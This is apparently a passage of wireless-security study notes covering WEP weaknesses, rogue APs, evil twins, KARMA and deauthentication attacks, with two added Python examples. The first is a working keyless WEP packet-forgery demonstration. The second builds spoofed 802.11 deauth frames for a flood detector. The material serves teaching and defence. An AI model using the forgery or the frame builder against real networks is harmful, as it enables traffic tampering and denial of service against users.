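The three WEP weaknesses the table lists (RC4 keyed by IV||key, a 24-bit IV, and a CRC-32 ICV) are what the WEP cracking entries above rely on. The following added example, not code from the original notes or from aircrack-ng, builds a WEP-encrypted frame body and then, without the key, changes the payload while keeping the ICV valid, which is the integrity attack CRC-32 permits; it also computes the birthday bound that tells you how few frames it takes before two share an IV. The 40-bit key, IV, and payload are constructed.

```python
import math
import zlib

KEY_ID = b"\x00"
SNAP_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"  # LLC/SNAP header before every IP payload: known plaintext


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm, then pseudo-random generation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian on the wire."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV(3) | KeyID(1) | RC4(IV||key) applied to plaintext || ICV."""
    keystream = rc4(iv + wep_key, len(plaintext) + 4)
    return iv + KEY_ID + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return the plaintext if the ICV verifies, else None (what a receiver does)."""
    iv, body = frame[:3], frame[4:]
    p = xor(body, rc4(iv + wep_key, len(body)))
    data, tag = p[:-4], p[-4:]
    return data if tag == icv(data) else None


def forge(frame: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Rewrite plaintext bytes at `offset` without the key and keep the ICV valid.
    CRC-32 is affine: crc(P xor M) = crc(P) xor crc(M) xor crc(0...0), so the attacker
    XORs the ciphertext with M || (crc(M) xor crc(zeros)) and the receiver accepts it."""
    n = len(frame) - 4 - 4              # plaintext length: minus IV/KeyID, minus ICV
    mask = bytearray(n)
    for i, (o, w) in enumerate(zip(old, new)):
        mask[offset + i] = o ^ w
    mask = bytes(mask)
    icv_delta = xor(icv(mask), icv(bytes(n)))
    return frame[:4] + xor(frame[4:], mask + icv_delta)


def frames_until_iv_collision(p: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: frames needed before two reuse an IV with probability p."""
    return math.ceil(math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - p))))


def demo() -> dict:
    wep_key = bytes.fromhex("0badc0ffee")   # constructed 40-bit key; the attacker never learns it
    iv = b"\x01\x02\x03"
    plaintext = SNAP_IP + b"PAY 100 TO ALICE"
    frame = wep_encrypt(wep_key, iv, plaintext)
    forged = forge(frame, len(SNAP_IP) + 4, b"100", b"999")   # attacker edits the amount blind
    return {
        "original": wep_decrypt(wep_key, frame),
        "forged": wep_decrypt(wep_key, forged),
        "frames_for_50pct_iv_reuse": frames_until_iv_collision(),
    }


if __name__ == "__main__":
    print(demo())
```

Roughly 4,800 frames give a 50% chance of an IV repeat, and every IP frame starts with the same SNAP header, which is the known plaintext the statistical (FMS/PTW) key-recovery attacks in aircrack-ng build on; the forged frame above shows why "integrity" via CRC-32 adds nothing against an active attacker.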
Rogue AP vs Evil Twin
Rogue AP: disables SSID broadcast and is set up INSIDE the network (an unauthorized device on the internal LAN). Evil Twin: copies and broadcasts the SSID of the target network and is set up OUTSIDE the network perimeter.
Misconfiguration Key Elements (Misconfigured AP Attack)
SSID broadcast
- APs using default SSIDs are easy targets: the default SSID reveals the vendor and feeds dictionary attacks
- The SSID is sent in cleartext in beacons; if the SSID (or something derived from it) is used as the password, broadcasting it discloses the password
Weak password
- Some network admins incorrectly use the SSID as a basic password
WarChalking
Symbols are drawn in public places to advertise open Wi-Fi networks.
KARMA Attack
- Create an evil twin using the KARMA tool: it answers every client probe request with the probed SSID, so devices that remember networks automatically associate with the attacker's AP
WarWalking
o Attackers walk around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks.
MAC DoS Attacks
o De-authentication flood attacks = everyone gets de-authenticated
o Virtual jamming
o Association flood attacks
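The de-authentication and disassociation attacks above (De-authentication Attack, Disassociation Attack, Denial-of-Service Attack, and the de-authentication flood under MAC DoS) all come down to a burst of unauthenticated management frames from a spoofed source. This added example, not code from the original notes, builds raw 802.11 management frames, parses them, and runs a per-source sliding-window detector over a constructed capture: one benign disassociation and a 64-frame broadcast deauth flood spoofing the AP. MAC addresses, timestamps, and the threshold are assumptions.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10        # 802.11 management frame subtypes
BROADCAST = b"\xff" * 6


def build_mgmt(subtype: int, da: bytes, sa: bytes, bssid: bytes, seq: int, reason: int) -> bytes:
    """Raw 802.11 management frame (no radiotap/FCS):
    frame control | duration | addr1=DA | addr2=SA | addr3=BSSID | seq ctl | reason code."""
    fc = bytes([(subtype << 4) | 0x00, 0x00])       # type 0 = management, flags 0
    seq_ctl = struct.pack("<H", seq << 4)           # sequence number in the upper 12 bits
    return fc + b"\x00\x00" + da + sa + bssid + seq_ctl + struct.pack("<H", reason)


def parse_mgmt(frame: bytes):
    """Return (subtype, da, sa, bssid, seq, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26:
        return None
    ftype = (frame[0] >> 2) & 0x3
    subtype = frame[0] >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    da, sa, bssid = frame[4:10], frame[10:16], frame[16:22]
    seq = struct.unpack("<H", frame[22:24])[0] >> 4
    reason = struct.unpack("<H", frame[24:26])[0]
    return subtype, da, sa, bssid, seq, reason


class DeauthFloodDetector:
    """Alert once when one source sends more than `threshold` deauth/disassoc frames
    to a BSS within `window` seconds. Occasional frames are normal; bursts are not."""

    def __init__(self, threshold: int = 10, window: float = 1.0):
        self.threshold, self.window = threshold, window
        self.history = defaultdict(deque)    # (sa, bssid) -> recent timestamps
        self.fired = set()
        self.alerts = []

    def feed(self, ts: float, frame: bytes):
        parsed = parse_mgmt(frame)
        if parsed is None:
            return
        subtype, da, sa, bssid, seq, reason = parsed
        key = (sa, bssid)
        q = self.history[key]
        q.append(ts)
        while q and ts - q[0] > self.window:     # drop frames older than the window
            q.popleft()
        if len(q) > self.threshold and key not in self.fired:
            self.fired.add(key)
            self.alerts.append({
                "sa": sa.hex(":"), "bssid": bssid.hex(":"),
                "subtype": "deauth" if subtype == DEAUTH else "disassoc",
                "broadcast": da == BROADCAST,    # broadcast deauth hits every client at once
                "reason": reason, "count": len(q), "at": ts,
            })


def demo() -> DeauthFloodDetector:
    ap = bytes.fromhex("00112233aabb")       # constructed AP/BSSID
    client = bytes.fromhex("c4e9840f1234")   # constructed client
    d = DeauthFloodDetector(threshold=10, window=1.0)
    # Benign: the AP disassociates one client that is leaving (reason 8).
    d.feed(0.0, build_mgmt(DISASSOC, client, ap, ap, 1, 8))
    # Attack: 64 broadcast deauth frames spoofing the AP as source, reason 7
    # ("class 3 frame received from non-associated STA"), 5 ms apart.
    for i in range(64):
        d.feed(5.0 + i * 0.005, build_mgmt(DEAUTH, BROADCAST, ap, ap, 100 + i, 7))
    return d


if __name__ == "__main__":
    for alert in demo().alerts:
        print(alert)
```

A second heuristic worth adding in production is sequence-number tracking: frames spoofing the AP's address carry sequence numbers that do not follow the real AP's counter. The root fix is 802.11w/PMF, which authenticates these frames so forged ones are dropped before any counter is consulted.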